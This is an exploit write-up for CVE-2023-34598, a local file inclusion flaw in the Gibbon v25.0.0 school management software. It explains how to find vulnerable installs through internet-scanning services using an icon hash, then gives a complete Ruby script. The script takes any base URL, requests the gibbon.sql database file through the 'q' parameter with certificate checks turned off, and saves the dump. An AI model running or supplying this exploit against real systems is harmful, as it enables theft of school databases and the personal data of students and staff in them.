CVE-2023-34598

Gibbon v25.0.0 Local File Inclusion

"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) where it's possible to include the content of several files present in the installation folder in the server's response." -nvd.nist.gov Gibbon is a flexible open source school management platform. Exploiting this vulnerability is much easier than you think, manipulating the "q" parameter you can query a local file and that's it. The juiciest file you can find, is gibbon.sql which contains all the tables and data necessary for the operation of the software.
[*] gibbon.png

Looking for vulnerable targets

No long speeches, the icon hash is-165631681 vulnerable versions are before the 25.0.00 (included), you may want to except newest versions. You can search it on Shodan or similar services, like Hunter, FOFA or Zoomeye.
[*] fofa_results.png
Here is an hunter query that search the same thing.

Exploit code

To automate this, i wrote this exploit in ruby
require 'http'
require 'openssl'

puts """
CVE-2023-34598
Gibbon v25.0.0 LFI exploit
By komodo\n
"""

$cont=1
$dirname="Gibbon_dump"
def dir(name=$dirname)
    begin
        Dir.mkdir(name)
        Dir.chdir(name)
    rescue Errno::EEXIST
        $cont+=1
        dir("#{$dirname}-#{$cont}")
    end
end

def main(url)
    url.delete_suffix!("/") unless url[-1..-1] != "/"
    @ctx = OpenSSL::SSL::SSLContext.new()
    @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    r=HTTP.get("#{url}/?q=gibbon.sql", :ssl_context=>@ctx)
    lmao = r.body.to_s
    if r.code == 200 and lmao.index("SQL Dump") != nil
        dir()
        File.open("!target.txt", "w"){|f|f.write(url)}
        File.new("gibbon.sql","w").write(lmao[lmao.index("-- phpMyAdmin")..lmao.index("AUTO_INCREMENT=8;")+16])
        puts "Database dump saved on '#{Dir.pwd.split("/")[-1]}/gibbon.sql' file."
    else
        puts "Not vulnerable! :(\n"
    end
end

begin
    print "Base URL: "
    main(gets.chomp)
rescue => e 
    abort(e.to_s)
end